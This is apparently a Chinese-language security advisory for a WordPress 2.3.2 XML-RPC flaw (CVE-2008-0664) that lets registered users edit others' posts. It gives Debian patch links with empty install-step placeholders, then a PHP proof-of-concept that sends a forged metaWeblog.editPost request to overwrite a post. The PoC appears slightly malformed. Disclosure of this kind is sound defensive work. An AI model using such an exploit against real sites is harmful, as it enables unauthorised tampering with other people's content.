BUGTRAQ ID: 27669
CVE(CAN) ID: CVE-2008-0664
WordPress是一款免费的论坛Blog系统。
如果启用了注册的话,WordPress的XML-RPC实现(xmlrpc.php)就无法对页面所设置的post_type执行检查,这允许远程攻击者向论坛提交恶意请求更改编辑其他用户的张贴。
WordPress 2.3.2
临时解决方法:
厂商补丁:
Debian已经为此发布了一个安全公告(DSA-1601-1)以及相应补丁:
DSA-1601-1:New wordpress packages fix several vulnerabilities
链接:<a href=“http://www.debian.org/security/2008/dsa-1601” target=“_blank”>http://www.debian.org/security/2008/dsa-1601</a>
补丁下载:
Source archives:
<a href=“http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz” target=“_blank”>http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz</a>
Size/MD5 checksum: 520314 e9d5373b3c6413791f864d56b473dd54
<a href=“http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.dsc” target=“_blank”>http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.dsc</a>
Size/MD5 checksum: 891 d925a63731976b72ad35e4c1805623bf
<a href=“http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.diff.gz” target=“_blank”>http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.diff.gz</a>
Size/MD5 checksum: 46073 486916bd4fc6463181eaba84fdc2db31
Architecture independent packages:
<a href=“http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3_all.deb” target=“_blank”>http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3_all.deb</a>
Size/MD5 checksum: 527158 280ba949f5c38079d2209a468697fb00
补丁安装方法:
首先,使用下面的命令来下载补丁软件:
然后,使用下面的命令来安装补丁:
使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
然后,使用下面的命令安装更新软件包:
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://wordpress.org/” target=“_blank”>http://wordpress.org/</a>
1. <?php
2. /**
3. * POC : XMLRPC Hack
4. *
5. */
6. $host = ''; // blog url
7. $page = '/xmlrpc.php';
8. $data = '<?xml version="1.0" ?>
9. <methodcall>
10. <methodname>metaWeblog.editPost</methodname>
11. <params>
12. <value>
13. <i4>post_ID</i4>
14. </value>
15. <value>
16. <string>username</string>
17. </value>
18. <value>
19. <string>password</string>
20. </value>
21. <struct>
22. <member>
23. <name>post_type</name>
24. <value>page</value>
25. </member>
26. <member>
27. <name>title</name>
28. <value>
29. <string>Pwnd</string>
30. </value>
31. </member>
32. <member>
33. <name>description</name>
34. <value>Whoo is ma biatch</value>
35. </member>
36. </struct>
37. </params>
38. </methodcall>';
39.
40. $exploited = fsockopen($host, 80, $errorNumber, $errorString);
41. $requestHeader = " ".$page." HTTP/1.1\r\n";
42. $requestHeader.= "Host: ".$host."\r\n";
43. $requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
44. $requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n";
45. $requestHeader.= "Content-Length: ".strlen($data)."\r\n";
46. $requestHeader.= "Connection: close\r\n\r\n";
47. $requestHeader.= $data;
48. fwrite($exploited, $requestHeader );
49.
50. echo 'done';
51. ?>